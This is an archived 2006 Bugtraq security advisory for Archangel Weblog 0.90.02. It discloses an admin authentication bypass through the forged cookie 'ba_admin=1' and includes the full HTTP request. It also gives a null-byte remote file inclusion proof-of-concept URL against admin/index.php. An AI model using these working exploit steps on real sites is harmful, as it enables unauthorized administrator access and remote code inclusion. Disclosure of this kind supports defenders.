lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060226132345.11017.qmail@securityfocus.com>
Date: 26 Feb 2006 13:23:45 -0000
From: kingofska@...il.com
To: bugtraq@...urityfocus.com
Subject: Archangel Weblog 0.90.02 Admin Authentication Bypass & Remote
 File Inclusion


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

KingOfSka - http://www.cpc.info.ms                       
Contro Potere Crew Advisories #5 26/02/2006
http://www.archangelmgt.com/ 
Archangel Weblog 0.90.02 Admin Authentication Bypass & Remote File Inclusion         
#########################################################
#1:.     Background :
      	Archangel Weblog is a new, full featured weblog application. Written in PHP and using a MySQL database backend, Archangel Weblog is easy to install, easy to configure and customize, and easy to use for most anyone. 
#2:.    The Bug :
    The bug is caused by an insufficient filtering of user submitted input.A malicious user, could easily forge cookies to obtain unauthorized administrator credentials, and trhough the administration panel is possible to perform a Local\Remote File Inclusion.
#3:.    Exploiting :

	To get administrator access to the weblog script, just use a get request like this:

    [http get request]
	GET http://127.0.0.1/awb/admin/index.php HTTP/1.1
        Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051229 Firefox/1.0.7
	Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
	Accept-Language: en-us,en;q=0.5
	Accept-Encoding: gzip,deflate
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
	Keep-Alive: 300
	Connection: keep-alive
	Cookie: ba_admin=1
	Cache-Control: max-age=0
    [/http get request]

	or just add the cookie to your request..
	Now, take a look at /admin/index.php , line 54:

	<?php include($index . ".php"); ?>

	So, arbitrary file inclusion is possible, by using NULL char to filter out the .php extension.
	PoC:
	http://127.0.0.1/awb/admin/index.php?index=http://www.google.it%00

	
#4:.    Vendor Status / Patch :
    
    	No Contact

#5:.    Links :
    http://contropotere.netsons.org/kingofska.asc - Public GnuPG Key
    http://contropotere.netsons.org    -  Contro Potere Crew Forums , here you can ask for an                            			  unofficial patch or for more info.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iQEVAwUBRAGtT3X+WtVr4QeuAQLX7wf+Jlgo5XekN+Bccqh7rl/5NJEcGkdWBtRo
aQRzveUw2NYVdeBSTCszsSfWwW2fiAfPqWqQTQlrzNQNvka2Q34MO1qBxZ//6L0L
Cu8GrAbNIUwb8jeK4nOLSG9hoBJ/2Nh+GRk4C39Rqtr7i5kQl28Ca4MDi21eID2K
u/K7dWQlIFrQcfHPUSFjGNTdMu5mHycKmUEl52KYdofUG5pHDW0cX4deZNcc93L8
ZNMFKCXL6XM0x42/xdmUWpP0ySMpMVoRJxpGS1WCUtpTqorPQPq025ZIB91l9E8j
x9UaRiRzy4mS7kTN5+mOl/3yZUoN+KsFo9HY7WPL3BBD2Z+wAU2Wbg==
=bJwT
-----END PGP SIGNATURE-----


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ